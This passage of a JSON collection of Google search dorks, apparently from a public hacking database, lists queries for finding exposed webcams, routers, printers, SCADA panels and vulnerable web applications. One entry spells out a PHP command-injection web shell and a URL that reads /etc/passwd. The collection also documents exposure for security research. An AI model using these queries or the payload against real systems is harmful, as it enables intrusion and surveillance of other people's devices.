-\"holaconnect.com\" -\"kzhead.info\"", "description": "# Google Dork: intext:\"Egardia & WoonVeilig\" -site:\"linkedin.*\" -\"data-lead.com\" -\"getemail.io\" -\"holaconnect.com\" -\"kzhead.info\"\r\n\r\n# Various online devices\r\n\r\n# Date: 21/07/2021\r\n\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intext:\"Live View\" inurl:ui3.htm", "description": "# Google Dork: intext:\"Live View\" inurl:ui3.htm\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"lg smart ip device\" -.com", "description": "# Google Dork: intitle:\"lg smart ip device\" -.com\r\n# Category: Various Online Devices\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"7100 login\" \"lancom\"", "description": "# Google Dork: intitle:\"7100 login\" \"lancom\"\r\n# Category: Pages Containing Login Portals\r\n# Date: 05/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/multi.html intitle:webcam", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: inurl:/multi.html intitle:webcam\r\n# Date: 2021-06-28\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/hp/device/SignIn/", "description": "# Google Dork: inurl:/hp/device/SignIn/\r\n# Category: Various Online Devices\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:/view.htm?mode=l", "description": "# Google Dork: inurl:/view.htm?mode=l\r\n# Various online devices\r\n# Date: 17/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Blue Iris Remote View\"", "description": "# Google Dork: intitle:\"Blue Iris Remote View\"\r\n# Various Online Devices\r\n# Date: 18/07/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"jpegpush.htm\"", "description": "# Google Dork: inurl:\"jpegpush.htm\"\r\n# Various Online Devices\r\n# Date: 19/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"xerox\" inurl:i_index", "description": "# Google Dork: intitle:\"xerox\" inurl:i_index\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Cisco ASDM\" inurl:\"admin/public/index.html\"", "description": "# Google Dork: intitle:\"Cisco ASDM\" inurl:\"admin/public/index.html\"\r\n# Date: 29/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "\"IPECS\" inurl:a_index.html", "description": "# Google Dork: \"IPECS\" inurl:a_index.html\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Welcome to\" intext:\"configuration interface\"", "description": "# Google Dork: intitle:\"Welcome to\" intext:\"configuration interface\"\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"2009 PLANET Technology Corporation\"", "description": "# Google Dork: intext:\"2009 PLANET Technology Corporation\"\r\n# Category: Various Online Devices\r\n# Date: 30/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"PRTG Network Monitor\" inurl:index.htm intext:\"Password\" -inurl:prtg", "description": "# Google Dork: intitle:\"PRTG Network Monitor\" inurl:index.htm intext:\"Password\" -inurl:prtg\r\n# Category: Various Online Devices\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Netgear System Login\" intext:\"system name\"", "description": "# Google Dork: intitle:\"Netgear System Login\" intext:\"system name\"\r\n# Category: Various Online Devices\r\n# Date: 04/08/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Hello! Welcome to Synology Web Station!\"", "description": "# Google Dork: intitle:\"Hello! Welcome to Synology Web Station!\"\r\n# Various Online Devices\r\n# Date: 6/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/nphMotionJpeg?Resolution=", "description": "# Google Dork: inurl:/nphMotionJpeg?Resolution=\r\n# Pages Various Online Devices\r\n# Date: 24/08/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:hp/device/webAccess", "description": "# Google Dork: inurl:hp/device/webAccess\r\n# Various Online Devices\r\n# Date: 8/30/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"setup\" \"Network setup\" \"DHCP Client ID\" -.com", "description": "# Google Dork: intitle:\"setup\" \"Network setup\" \"DHCP Client ID\" -.com\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Welcome-netis Wireless\"", "description": "# Google Dork:intitle:\"Welcome-netis Wireless\"\r\n# Various Online Devices\r\n# Date: 01/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Router Name\" \"Router Model\" \"LAN MAC\" \"WAN MAC\"", "description": "# Google Dork: \"Router Name\" \"Router Model\" \"LAN MAC\" \"WAN MAC\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"D-LINK CORPORATION, INC\" intext:\"D-Link Corporation, Inc.\" -dlink.ca", "description": "# Google Dork:intitle:\"D-LINK CORPORATION, INC\" intext:\"D-Link Corporation, Inc.\" -dlink.ca\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Login\" intext:\"PLANET Technology Corporation. All rights reserved.\"", "description": "# Google Dork: intitle:\"Login\" intext:\"PLANET Technology Corporation. All rights reserved.\"\r\n# Pages Containing Login Portals\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"JUNG KNX Smart-Panel\" \"JUNG Single Regular\"", "description": "# Google Dork: intitle:\"JUNG KNX Smart-Panel\" \"JUNG Single Regular\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"This page displays the general system information of the print server.\"", "description": "# Google Dork: intext:\"This page displays the general system information of the print server.\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"Language\" \"SIM NUM\" \"DEV NUM\" intitle:\"mdvr\"", "description": "# Google Dork: \"Language\" \"SIM NUM\" \"DEV NUM\" intitle:\"mdvr\"\r\n# Various Online Devices\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Device(Foscam)\" \"Real-time IP Camera Monitoring System\"", "description": "# Google Dork: intitle:\"Device(Foscam)\" \"Real-time IP Camera Monitoring System\"\r\n# Various Online Devices\r\n# Date: 12/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"SoundTouch Access Point Setup\"", "description": "# Google Dork: intitle:\"SoundTouch Access Point Setup\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Bose SoundTouch Wi-Fi Music System Setup\" inurl:\"/setup/index.asp\"", "description": "# Google Dork: intitle:\"Bose SoundTouch Wi-Fi Music System Setup\" inurl:\"/setup/index.asp\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ACEmanager\" \"ALEOS Version\"", "description": "# Google Dork: intitle:\"ACEmanager\" \"ALEOS Version\"\r\n# Various Online Devices\r\n# Date: 13/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\"Datamanager\" \"Devices\" \"Reports\" \"Alarm\" \"Log\" \"Service\" \"Gp Run-On\"", "description": "# Google Dork: \"Datamanager\" \"Devices\" \"Reports\" \"Alarm\" \"Log\" \"Service\" \"Gp Run-On\"\r\n# Various Online Devices\r\n# Date: 11/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"yawcam\" \"It's a webcam!\" \"user\" \"pass\"", "description": "# Google Dork: intitle:\"yawcam\" \"It's a webcam!\" \"user\" \"pass\"\r\n# Various Online Devices\r\n# Date: 23/07/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"ipMonitor - Log in\"", "description": "# Google Dork: intitle:\"ipMonitor - Log in\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Codian MCU\" \"MCU\" \"Home Streaming Conferences\"", "description": "# Google Dork: intitle:\"Codian MCU\" \"MCU\" \"Home Streaming Conferences\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"amcrest\" \"Invalid login credentials\"", "description": "#Google Dork: intext:\"amcrest\" \"Invalid login credentials\"\r\n# Various Online Devices\r\n# Date: 25/06/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:/controlmenu.htm", "description": "# Google Dork: inurl:/controlmenu.htm\r\n# Various Online Devices\r\n# Date: 18/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Pyramid Debug Toolbar\" inurl:_debug_toolbar", "description": "# Google Dork: intitle:\"Pyramid Debug Toolbar\" inurl:_debug_toolbar\r\n# Various Online Devices\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"CirCarLife Scada\" inurl:/html/index.html", "description": "# Google Dork: intitle:\"CirCarLife Scada\" inurl:/html/index.html\r\n# Various Online Devices\r\n# Date: 088/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"amcrest\" \"LDAP User\"", "description": "#Google Dork: intext:\"amcrest\" \"LDAP User\"\r\n# Various Online Devices\r\n# Date: 26/06/2021\r\n#Exploit Author: Neha Singh"}, {"dork": "intitle:\"Youless energy monitor\" \"Model\" \"Firmware\" \"www.youless.nl\"", "description": "# Google Dork: intitle:\"Youless energy monitor\" \"Model\" \"Firmware\" \"www.youless.nl\"\r\n# Various Online Devices\r\n# Date:17/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/cgi-bin/login.html \"qnap turbo nas\"", "description": "#Google Dork: inurl:/cgi-bin/login.html \"qnap turbo nas\"\r\n# Various Online Devices\r\n# Date: 17/05/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"C-more -- the best HMI presented by AutomationDirect\"", "description": "# Dork: intitle:\"C-more -- the best HMI presented by AutomationDirect\""}, {"dork": "intitle:\"OS-ZuKon\" \"SSS Siedle\"", "description": "# Google Dork: intitle:\"OS-ZuKon\" \"SSS Siedle\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"EnvisionGateway\" \"scheduler\" \"control\"", "description": "# Google Dork: intitle:\"EnvisionGateway\" \"scheduler\" \"control\"\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"IPC CHIP Main Page\" \"Beck IPC GmbH\"", "description": "# Google Dork: intitle:\"IPC CHIP Main Page\" \"Beck IPC GmbH\"\r\n# Various Online Devices\r\n# Date: 19/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/admin/public/asdm.jnlp \"ASDM on\"", "description": "# Google Dork: inurl:/admin/public/asdm.jnlp \"ASDM on\"\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"SPC4300\" \"ID\"", "description": "# Google Dork: intitle:\"SPC4300\" \"ID\"\r\n# Various Online Devices\r\n# Date: 06/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\u00a920 \"Copyright Yamaha Corporation Visit\"", "description": "# Google Dork: \u00a920 \"Copyright Yamaha Corporation Visit\"\r\n# Various Online Devices\r\n# Date: 28/09/2021 \r\n# Exploit Author: MiningOmerta\r\n\r\n This dorks finds Yamaha Systems that can be controlled and configured remotely. Unauthenticated access to various Yamaha devices. While unauthenticated (no prompt for authentication), one has the ability to upload firmware, remotely interact with devices from the URL (http://ip.addr/index.html?zone=0&foo=1), alter network and name settings, AirPlay and wifi password disclosure, change network settings to something other than they are, dissect firmware via backup, etc. There is also disclosure of the device\u2019s internal IP address in the network settings."}, {"dork": "Fwd: intitle:\"Codian MCU - Home Page\"", "description": "# Google Dork: intitle:\"Codian MCU - Home Page\"\r\n# Various Online Devices\r\n# Date: 08/10/2021 \r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"SPC4300\" \"ID\"", "description": "# Google Dork: Fwd: intitle:\"SPC4300\" \"ID\"\r\n# Various Online Devices\r\n# Date:08/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"OS-ZuKon\" \"SSS Siedle\"", "description": "# Google Dork: Fwd: intitle:\"OS-ZuKon\" \"SSS Siedle\"\r\n# Various Online Devices\r\n# Date:09/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"Heatmiser Wifi Thermostat\" \"username\" -.com", "description": "# Google Dork: intitle:\"Heatmiser Wifi Thermostat\" \"username\" -.com\r\n# Various Online Devices\r\n# Date: 14/10/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"webcamXP 5\" inurl:admin.html", "description": "# Google Dork: intitle:\"webcamXP 5\" inurl:admin.html\r\n# Various Online Devices\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"ADSL Router\" inurl:\"/login.htm\"", "description": "# Google Dork: intitle:\"ADSL Router\" inurl:\"/login.htm\"\r\n# Various Online Devices\r\n# Date: 20/10/2021 \r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Microseven M7CAM IP Camera\"", "description": "# Google Dork: intitle:\"Microseven M7CAM IP Camera\"\r\n# Various Online Devices\r\n# Date:26/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\" - General Status [none]\"", "description": "# Google Dork: intitle:\" - General Status [none]\"\r\n# Various Online Devices\r\n# Date: 04/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "intitle:\"webcamXP\" inurl:8080", "description": "# Google Dork: intitle:\"webcamXP\" inurl:8080\r\n# Various Online Devices\r\n# Date: 08/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Real-time IP Camera Monitoring System\" intext:\"ActiveX Mode (For IE Browser)\"", "description": "# Google Dork: intext:\"Real-time IP Camera Monitoring System\" intext:\"ActiveX Mode (For IE Browser)\"\r\n# Various Online Devices\r\n# Date:16/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Secure Access Service\" inurl:\"/dana-na/auth/url_default/welcome.cgi\"", "description": "# Google Dork: intitle:\"Secure Access Service\" inurl:\"/dana-na/auth/url_default/welcome.cgi\"\r\n# Various Online Devices\r\n# Date:16/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "intitle:\"MODBUS TCP RS485 Converter\" intext:\"Module Name: MMTCPBCONV\" \"powered by Atmel ARM.\"", "description": "# Google Dork: intitle:\"MODBUS TCP RS485 Converter\" intext:\"Module Name: MMTCPBCONV\" \"powered by Atmel ARM.\"\r\n# Various Online Devices\r\n# Date: 26/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\" SyncThru Web Service\" intext:\"Supplies Information\"", "description": "# Google Dork: intitle:\" SyncThru Web Service\" intext:\"Supplies Information\"\r\n# Various Online Devices\r\n# Date:14/06/2022\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:webcam site:skylinewebcams.com inurl:roma", "description": "# Google Dork: inurl:webcam site:skylinewebcams.com inurl:roma\r\n# Various Online Devices\r\n# Date:11/02/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "inurl:/doc/page/login.asp?", "description": "# Google Dork: inurl:/doc/page/login.asp?\r\n# Various Online Devices\r\n# Date: 18/02/2022\r\n# Exploit Author: Stuart Steenberg\r\n#Description: Used to find Hikvision camera login pages."}, {"dork": "inurl:7001/console intitle:weblogic", "description": "# Google Dork: inurl:7001/console intitle:weblogic\r\n# Various Online Devices\r\n# Date: 31/05/2022\r\n# Exploit Author: Al Imran"}, {"dork": "Various Online Devices Dork", "description": "# Google Dork: inurl /view.shtml intext:\"Beach\"\r\n# Various Online Devices\r\n# Date:7/06/2022\r\n# Exploit Author: isa ghojaria"}, {"dork": "intitle:\"Roteador Wireless\" inurl:login.asp", "description": "# Google Dork: intitle:\"Roteador Wireless\" inurl:login.asp\r\n# Category: Various Online Devices\r\n# Date: 14/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"web server login\" \"please enter your login\"", "description": "# Google Dork: intitle:\"web server login\" \"please enter your login\"\r\n# Category: Various Online Devices\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Network Camera\" inurl:main.cgi", "description": "Google Dork: intitle:\"Network Camera\" inurl:main.cgi\r\n# Various Online Devices\r\n# Date:20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Pi-hole-ip\" inurl:admin", "description": "# Google Dork: intitle:\"Pi-hole-ip\" inurl:admin\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"NoVus IP camera\" -com", "description": "# Google Dork: intitle:\"NoVus IP camera\" -com\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Gargoyle Router Management Utility\" -com|net", "description": "# Google Dork: intitle:\"Gargoyle Router Management Utility\" -com|net\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:viewer/live/index.html", "description": "# Google Dork: inurl:viewer/live/index.html\r\n# Date: 08/04/22\r\n# Category : Various Online Devices\r\n# Exploit Author: Palvinder Singh Secuneus\r\n# Version: WV-SW175"}, {"dork": "intitle:phaser inurl:/frameprop.htm", "description": "# Google Dork: intitle:phaser inurl:/frameprop.htm\r\n# Various Online Devices\r\n# Date: 22/11/2022 \r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "Google Dork: HP Laserjet Config Network Page", "description": "# Google Dork:HP Laserjet Config Network Page\r\n# Various Online Devices\r\n# Date:21/02/2023\r\n# Exploit Author: Kerim Mert YILDIRIM"}, {"dork": "Google Dork: Xerox Phaser Printer Properties Page", "description": "# Google Dork: intitle:phaser inurl:/frameprop.htm\r\n# Various Online Devices\r\n# Date:22/02/2023\r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "Google Dork: Brother Printers Properties Page", "description": "# Google Dork: inurl:main.html intitle:brother\r\n# Various Online Devices\r\n# Date:26/02/2023\r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "inurl:\"device.rsp\" -in", "description": "# Google Dork: inurl:\"device.rsp\" -in\r\n# Various Online Devices\r\n# Date:08/03/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "Google Dork : intitle:\"Toshiba Network Camera\"", "description": "# Google Dork: Google Dork : intitle:\"Toshiba Network Camera\"\r\n# Various Online Devices\r\n# Date:14/03/2023\r\n# Exploit Author: Shilpa Shaji"}, {"dork": "=?UTF-8?Q?intext:\"Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product.\"_hikvision?=", "description": "# Google Dork: intext:\"Please respect other people\u2019s privacy and\r\nrights when using product.\" hikvision\r\n# Various Online Devices\r\n# Date:10/04/2023\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "Google Dork: Recoh Printer Properties Page", "description": "# Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi\r\n# Various Online Devices\r\n# Date:14/04/2023\r\n# Exploit Author: Hasan Ali YILDIR"}, {"dork": "Re: GHDB - Dork", "description": "# Google Dork: intitle: \"webcam\" site: \"live\"\r\n# Various Online Devices\r\n# Date:02/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "allintitle:\"A8810-0\"", "description": "# Google Dork: allintitle:\"A8810-0\"\r\n# Various Online Devices\r\n# Date:31/05/2023\r\n# Exploit Author: Thomas Heverin"}, {"dork": "intitle:\"Webcam\" inurl:WebCam.htm", "description": "# Google Dork: intitle:\"Webcam\" inurl:WebCam.htm\r\n# Various Online Devices\r\n# Date: 07/11/2023\r\n# Exploit: s Thakur"}, {"dork": "inurl:home.htm intitle:1766", "description": "inurl:home.htm intitle:1766"}], "Advisories and Vulnerabilities": [{"dork": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "description": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/"}, {"dork": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", "description": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/"}, {"dork": "inurl:technote inurl:main.cgi*filename=*", "description": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter."}, {"dork": "intext:(\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.2\"|\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "description": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php"}, {"dork": "inurl:/SiteChassisManager/", "description": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/"}, {"dork": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "description": "Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109"}, {"dork": "powered.by.instaBoard.version.1.3", "description": "InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338"}, {"dork": "+intext:\"powered by MyBulletinBoard\"", "description": "MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)"}, {"dork": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "description": "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser."}, {"dork": "inurl:chitchat.php \"choose graphic\"", "description": "rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]"}, {"dork": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail"}, {"dork": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "description": "There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668"}, {"dork": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "description": "There is a (adduser) remote denial of service vulnerabilty on version 0.95"}, {"dork": "intitle:\"WEB//NEWS Personal Newsmanagement\" intext:\"\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002-2004 by Christian Scheb - Stylemotion.de\"+\"Version 1.4 \"+\"Login\"", "description": "WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries."}, {"dork": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "description": "cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded"}, {"dork": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "description": "It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html"}, {"dork": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "description": "Moodle"}, {"dork": "\"Powered by XOOPS 2.2.3 Final\"", "description": "XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html"}, {"dork": "\"This website was created with phpWebThings 1.4\"", "description": "This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in \"msg\" parameter:http://rgod.altervista.org/phpwebth14_xpl.html"}, {"dork": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "description": "this dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit:http://rgod.altervista.org/mambo452_xpl.html"}, {"dork": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "description": "eFiction"}, {"dork": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "description": "dork: \"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board\"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" now in config.dat we have: ... $title=\"Ultimate PHP Board \"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" \"; ... in header.php we have: ... include \"./db/config.dat\"; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd"}, {"dork": "\"Powered by Xaraya\" \"Copyright 2005\"", "description": "Xaraya"}, {"dork": "\"This website powered by PHPX\" -demo", "description": "this is the dork for PhpX"}, {"dork": "\"Based on DoceboLMS 2.0\"", "description": "advisory & poc exploit:http://rgod.altervista.org/docebo204_xpl.html"}, {"dork": "\"Site powered By Limbo CMS\"", "description": "this is the dork for Limbo Cms"}, {"dork": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "description": "CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: \"Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke\""}, {"dork": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "description": "PHPGedView"}, {"dork": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "description": "DEV cms"}, {"dork": "intitle:\"phpDocumentor web interface\"", "description": "Php Documentor < = 1.3.0 rc4 remote code xctn dork: intitle:\"phpDocumentor web interface\"advisory & poc exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html"}, {"dork": "inurl:install.pl intitle:GTchat", "description": "Gtchat install file.You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom."}, {"dork": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "description": "Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC"}, {"dork": "\"Powered by Simplog\"", "description": "searches for simplog which has directory traversal and XSS velnerabilites in version"}, {"dork": "\"powered by sblog\" +\"version 0.7\"", "description": "please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044"}, {"dork": "\"Thank You for using WPCeasy\"", "description": "There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. http://www.securityfocus.com/archive/1/425395"}, {"dork": "\"Powered by Loudblog\"", "description": "this dork is for the LoudBlog"}, {"dork": "intitle:\"b2evo installer\" intext:\"Installer f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr Version\"", "description": "this page lets you to know some interesting info on target machine, database name, username... it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html"}, {"dork": "\"This website engine code is copyright\" 